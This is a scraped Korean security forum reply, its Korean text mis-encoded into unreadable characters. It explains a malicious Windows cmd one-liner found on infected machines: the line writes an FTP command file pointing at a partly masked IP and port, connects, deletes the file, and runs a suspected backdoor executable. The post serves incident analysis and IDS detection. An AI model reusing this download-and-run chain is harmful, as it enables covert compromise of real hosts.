Å©·¡Å· ÇÇÇØ

 423, 11/22 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   pr0sp3r
   http://lastlog.com
   [re] rootkit¿¡ °üÇÑ Áú¹®ÀÔ´Ï´Ù..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_recover&no=226 [º¹»ç]


ÇØ´ç ÄÚµå´Â

cmd /k
echo open x.x.136.76 23825 > o &
echo user 1 1              >> o &
echo quit                  >> o &
ftp -n -s:o &
del /F /Q o &
axdcfasb.exe

À§¿Í °°Àº ÇüÅ·ΠÀÌ·ç¾î Áö¸ç

> ¸®´ÙÀÌ·ºÆ®(Ç¥ÁØÃâ·Â),
>> ¸®´ÙÀÌ·ºÆ®(Ç¥ÁØÃâ·Â Ãß°¡)
& ¹®ÀÚ¿­ Á¢¼ÓÀÚ


cmd.exeÀÇ ÆĶó¸ÞÅ͸¦ ÅëÇÑ ÀǵµÇÑ ÀÛ¾÷À» batch ÆÄÀÏ·Î ftp ÁÖ¼Ò¿Í
À¯Àú¸í/Æнº¿öµå ¸íÀ» ÆÄÀÏ·Î ÀúÀå½ÃŲ ÈÄ
¸¸µé¾îÁø o ÆÄÀÏÀÇ Á¤º¸¸¦ ÀÌ¿ëÇÏ¿© ftp Á¢¼ÓÇÏ°í,
¸¸µé¾îÁø ÆÄÀÏÀ» Áö¿îµÚ
axdcfasb.exe( ¾Æ¸¶µµ ¹éµµ¾î·Î ÀǽɵÊ) ¸¦ ½ÇÇàÇϵµ·Ï µÇ¾îÀֳ׿ä.


À¯»çÇÏ°Ô ÆÄÀÏÀ» ¸¸µé¸é..
-------------------------------------------------------------------------------
C:\DOCUME~1\ADMINI~1>cmd /k echo open 1.1.1.1>test.txt&echo user 1 1>>test.txt&
echo quit>>test.txt

exit

C:\DOCUME~1\ADMINI~1>type test.txt
open 1.1.1.1

C:\DOCUME~1\ADMINI~1>C:\DOCUME~1\ADMINI~1>user 1
quit
--------------------------------------------------------------------------------

À§¿¡¼­ »ç¿ëµÈ ÇÁ·Î±×·¥ÀÇ ÆĶó¸ÞÅÍ ¼³¸íÀÔ´Ï´Ù.

Windows2000 ¸í·É ÀÎÅÍÇÁ¸®ÅÍÀÇ »õ ÀνºÅϽº¸¦ ½ÃÀÛÇÕ´Ï´Ù.
CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /V:OFF]
    [[/S] [/C | /K] ¹®ÀÚ¿­]

/K      ¹®ÀÚ¿­ÀÌ ÁöÁ¤ÇÑ ¸í·É¾î¸¦ ¼öÇàÇÑ ÈÄ¿¡ °è¼Ó ³²¾ÆÀÖ½À´Ï´Ù.
===============================================================================

FTP [-v] [-d] [-i] [-n] [-g] [-s:filename] [-a] [-w:windowsize] [-A] [host]
-n             Suppresses auto-login upon initial connection.
-s:filename    Specifies a text file containing FTP commands; the
               commands will automatically run after FTP starts.
===============================================================================
DEL [/P] [/F] [/S] [/Q] [/A[[:]Ư¼º]] À̸§
/F            Àбâ Àü¿ë ÆÄÀÏÀ» °­Á¦·Î »èÁ¦ÇÕ´Ï´Ù.
/Q            Á¶¿ëÇÑ ¸ðµå, ±Û·Î¹ú ¿ÍÀϵå Ä«µå¿¡¼­ »èÁ¦Çصµ ¹¯Áö ¾Ê½À´Ï´Ù.
===============================================================================

>´Ù¼öÀÇ ½ºÆÔ¸±·¹ÀÌ È¤Àº ½ºÄ³´× Åø¿¡ µ¿ÀÛÇÏ´Â ÄÄÇ»Å͵鿡
>proceexpolore ·Î È®ÀÎÇغ» °á°ú ¾Æ·¡¿Í °°Àº µ¿ÀÛÀÌ ¼öÇàÁßÀÓÀ» ¾Ë ¼ö ÀÖ¾ú½À´Ï´Ù.
>
>Áß°£¿¡ »ðÀÔµÈ o&´Â ¾î¶² ¿ªÈ°À» ÇÏ´ÂÁö.. ¾Æ·¡ Äڵ忡 ´ëÇÑ »ó¼¼ÇÑ ºÐ¼®À» µµ¿ÍÁֽñ⠹ٶø´Ï´Ù.. °¨»çÇÕ´Ï´Ù..
>
>cmd /k echo open x.x.136.76 23825 > o&echo user 1 1 >> o &echo quti >> o &ftp -n -s:o &del /F /Q o &axdcfasb.exe
>
>¸Å¹ø °í¸¿½À´Ï´Ù...
===============================================================================


  Hit : 3808     Date : 2006/07/07 02:38



    
soarrr ´äº¯ °¨»çµå¸³´Ï´Ù.. ÇØ´ç ÆÐÅÏÀ» IDS ¿¡ µî·ÏÇØ ³ö¾ß°Ú±º¿ä.. 2006/07/10  
ChuRack ¿À... ¸ÚÁ®¿ä... 2006/07/17  
223     [re] v.wom.conficker °¨¿°[2]     Ǫ¸¥ÇÏ´Ã
06/02 3932
222     [re] v.wom.conficker °¨¿°     rlawogus320
08/08 3565
    [re] rootkit¿¡ °üÇÑ Áú¹®ÀÔ´Ï´Ù..[2]     pr0sp3r
07/07 3807
220     [re] php ÄÚµå Å©·¡Å·¿¡ °üÇÑ ¹®ÀÇÀÔ´Ï´Ù..[1]     ¸Û¸Û
06/01 4118
219     [re] Ȥ½Ã ¹ÙÀÌ·¯½ºÁß¿¡..     lkj22
08/16 2914
218     [re] Ȥ½Ã ¹ÙÀÌ·¯½ºÁß¿¡..[3]     lkj22
08/16 3237
217     [re] ÇØÄ¿¿Í Å©·¡Ä¿[3]     ¼Û½Ã
11/18 4164
216     [re] ÇØÄ¿¿Í Å©·¡Ä¿     ruo91
11/18 3288
215     [re] ÇØÄ¿¿Í Å©·¡Ä¿     ori0433
11/19 3771
214     [re] ÇØÄ¿¿Í Å©·¡Ä¿[3]     fhwmakdl
12/19 4172
213     [re] ÇØÄ¿°¡ µÇ°í½ÍÀºµ¥[1]     ¹«¼ÒÀ¯
12/16 4183
212     [re] ÇØÄð ¾Æµð ÇØÅ· -0-??     ¼ÒÀ¯
10/08 5023
211       [re] ÇØÄð ¾Æµð ÇØÅ· -0-??[5]     odk297
10/09 4332
210     [re] ÇØÅ·¶§¹®¿¡ ¹ÌÄ¡°Ú¾î¿ä~¤Ð¤Ð[2]     mnet21
03/08 4127
209     [re] ÇØÅ·À» ¾î¶² °æ·Î·Î ÇÏ°Ô µÇ´Â °ÇÁö=¤µ=;     X-line
12/18 3839
208     [re] ÇØÅ·Àº¾î¶»°ÔÇÏ´ÂÁö....     koresong
10/23 3260
207     [re] ÇØÅ·Àº¾î¶»°ÔÇÏ´ÂÁö....     ori0433
11/19 3694
206     [re] ÇØÅ· ±×·ì Áú¹®ÀÔ´Ï´Ù.     w0rm9
10/03 3684
205     [re] ÇÁ·Î±×·¡¹Ö ÄÄÆÄÀÏ ¹®Á¦Àε¥     ÃÖ¼±È£
12/07 3226
204     [re] ÁßÇб³¸¸È­ 4Æí Hello guta¿¡¼­     Tsum3000
02/28 3460
[1].. 11 [12][13][14][15][16][17][18][19][20]..[22]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org